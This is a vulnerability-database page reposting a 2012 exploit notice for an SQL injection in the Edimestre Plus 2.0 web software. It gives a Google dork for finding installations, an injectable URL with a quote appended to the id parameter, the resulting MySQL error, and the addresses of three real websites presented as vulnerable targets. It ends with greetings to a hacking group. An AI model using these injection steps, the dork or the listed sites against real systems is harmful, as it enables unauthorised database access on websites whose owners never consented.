Edimestre Plus 2.0 SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047135 漏洞类型
发布时间 2012-06-27 更新时间 2012-06-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060319
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Edimestre Plus 2.0 - Sql injection Vulnerability
# Date: 24 June 2012
# Author: Dark-Puzzle
# Vendor Website : http://www.edimestre.ca/
# Version: 2.0 previous versions may also be vulnerable .
# Category: Webapps/0day
# Google dork: intext:"Powered by Edimaster Plus" inurl:images.php
# Tested on: Windows Xp Sp2 , Backtrack 5 .

Exploit : 

http://www.example.com/modules/images/images.php?id=1&image=213&langue=en&menu=3

Howto:

the string (') must be added to ?id=7' without deleting the other functions 
"&image=213&langue=en&menu=3"

else the sql error won't show up .

Example :

http://www.example.com/modules/images/images.php?id=1'&image=213&langue=en&menu=3

error : 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (langue = 'en') ORDER BY length(texteurl) DESC' at line 2
+other stuff below .


Example Sites :

http://www.pedxray.com/modules/images/images.php?id=7'&image=335&langue=en&menu=31
http://netic.ca/modules/images/images.php?id=17'&image=379&langue=en
http://www.bertrandrpitt.net/modules/images/images.php?id=3'&image=136&langue=en

More At Google .

DARK-PUZZLE (Souhail)

Follow me : https://www.facebook.com/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Dr.napst3r , Jigs@w ...